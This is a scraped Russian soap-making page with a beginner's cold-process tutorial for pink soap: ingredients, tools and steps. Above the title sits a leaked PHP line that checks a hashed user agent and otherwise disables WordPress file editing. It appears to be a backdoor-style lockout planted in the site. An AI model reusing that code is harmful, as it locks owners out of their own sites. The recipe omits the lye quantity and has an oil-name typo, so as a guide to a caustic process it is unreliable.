if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Холодный способ при создании мыла. Мастер класс для обучающихся | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Холодный способ при создании мыла. Мастер-класс для начинающих

Мастер класс учит готовить мыло холодным способом. Доступно описаны все действия, справятся даже начинающие

Даже если вы нико­гда рань­ше не про­бо­ва­ли себя в каче­стве мыло­ва­ра, это не зна­чит, что у вас не полу­чит­ся изго­то­вить мыло сво­и­ми рука­ми с нуля, исполь­зо­вав холод­ный спо­соб. Конеч­но мож­но про­бо­вать свои силы и с более лег­ких мето­дов, но тогда ваш путь к холод­но­му может затя­нут­ся на дол­гое время.

Для того, что­бы мыло полу­чи­лось с пер­во­го раза, глав­ное най­ти пра­виль­ный мастер класс по мыло­ва­ре­нию для начи­на­ю­щих с фото, в кото­ром будет поша­го­во опи­сан весь про­цесс. Наде­юсь дан­ный урок ста­нет для вас стар­то­вым шагом, и вы сде­ла­е­те свое пер­вое мыло.

Состав ингре­ди­ен­тов для созда­ния розо­во­го мыла:

  •   20 г под­сол­неч­но­го масла,
  •   85 г олив­ко­во­го масла,
  •   200 г паль­мо­во­го масла,
  •   50 г кост­ро­во­го масла,
  •   120 г коко­со­во­го масла,
  •   160 и 75 г воды (при­го­то­вить в отдель­ных емкостях)
  •   Кра­си­тель (я исполь­зо­ва­ла розо­вый, цвет на ваше усмотрение)

Если есть жела­ние, може­те доба­вить отдуш­ку или ароматизатор.

Спи­сок инстру­мен­тов, кото­рые пона­до­бят­ся что­бы при­го­то­вить мыло в домаш­них усло­ви­ях:

  •   весы,
  •   фор­ма (жела­тель­но деревянная),
  •   марля,
  •   градусник,
  •   лопат­ка для поме­ши­ва­ний (дере­вян­ная),
  •   блендер.

1

Для холод­но­го спо­со­ба боль­ше под­хо­дит мине­раль­ная вода (без газа), но мож­но исполь­зо­вать и обыч­ную, пред­ва­ри­тель­но очи­стив ее с помо­щью филь­тра. Вода долж­на быть холод­ной. При рабо­те с щело­чью обя­за­тель­но одень­те пер­чат­ки, респи­ра­тор и защит­ные очки. Далее пере­хо­дим к уро­ку мыло­ва­ре­ния для начинающих

Шаг 1.

Для нача­ла рас­то­пи­те на вод­ной бане твер­дые мас­ла, пере­ме­ши­вая их что­бы уско­рить процесс.

2

Шаг 2.

После того как мас­ла пре­вра­тят­ся в одно­род­ную мас­су, добавь­те жид­кие мас­ла и пере­ме­шай­те смесь.

3

Затем измерь­те тер­мо­мет­ром тем­пе­ра­ту­ру сме­си, когда она достиг­нет 60 гра­ду­сов мож­но сни­мать мас­су с бани и пере­хо­дить к сле­ду­ю­ще­му шагу.

Шаг 3.

В отдель­ной емко­сти в охла­жден­ную воду всыпь­те лож­кой щелочь, отме­рив нуж­ное коли­че­ство. Делать это необ­хо­ди­мо в хоро­шо про­вет­ри­ва­е­мом месте, исполь­зуя защит­ные средства.

4

Если щелочь не пол­но­стью рас­тво­ри­лась, рас­твор будет мут­ным, и его необ­хо­ди­мо про­пу­стить через мар­лю, что­бы уда­лить слу­чай­но остав­ши­е­ся части­цы. Исполь­зо­ван­ную мар­лю выкинь­те, луч­ше в отдель­ном мешочке.

5

Шаг 4.

Измерь­те по оче­ре­ди тем­пе­ра­ту­ру двух сме­сей – масел и щело­чи. При дости­же­нии 50–55 гра­ду­сов, сме­шай­те щелочь с мас­ла­ми, мед­лен­но пере­ли­ва и помешивая.

6

Затем возь­ми­те блен­дер (он облег­чит про­цесс, но если его нет мож­но мешать лож­кой) и дове­ди­те смесь до состо­я­ния твер­до­сти – что­бы на ней сохра­нял­ся рису­нок. Это зай­мет око­ло 5 минут.

7 8

Шаг 5.

Когда смесь загу­сте­ла, добавь­те аро­ма­ти­за­то­ры и кра­си­те­ли, тща­тель­но пере­ме­шай­те и пере­ло­жи­те мыль­ную мас­су в форму.

9

Сле­ди­те что­бы фор­ма запол­ни­лась цели­ком и не было воз­душ­ных пустот.

Шаг 6.

Фор­му поме­сти­те в разо­гре­тую духов­ку. Жела­тель­но допол­ни­тель­но завер­нуть ее в поло­тен­це. В тече­нии 10 часов пару раз уби­рай­те фор­му и зано­во разо­гре­вай­те до 100 гра­ду­сов духов­ку. Этот про­цесс пред­на­зна­чен для того, что­бы прой­ти гели­е­вую стадию:

10

После это­го мыло долж­но остыть при ком­нат­ной тем­пе­ра­ту­ре в тече­нии 2 или 3 суток.

Шаг 7.

Извле­ки­те мыло, раз­режь­те на удоб­ные бру­соч­ки и каж­дый бру­сок обер­ни­те в бума­гу для выпе­ка­ния. Поме­сти­те все кус­ки в тря­поч­ную сал­фет­ку и убе­ри­те на 1,5 — 2 меся­ца. По исте­че­нии это­го вре­ме­ни мыло изго­тов­лен­ное сво­и­ми рука­ми по дан­но­му рецеп­ту будет гото­во к использованию.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!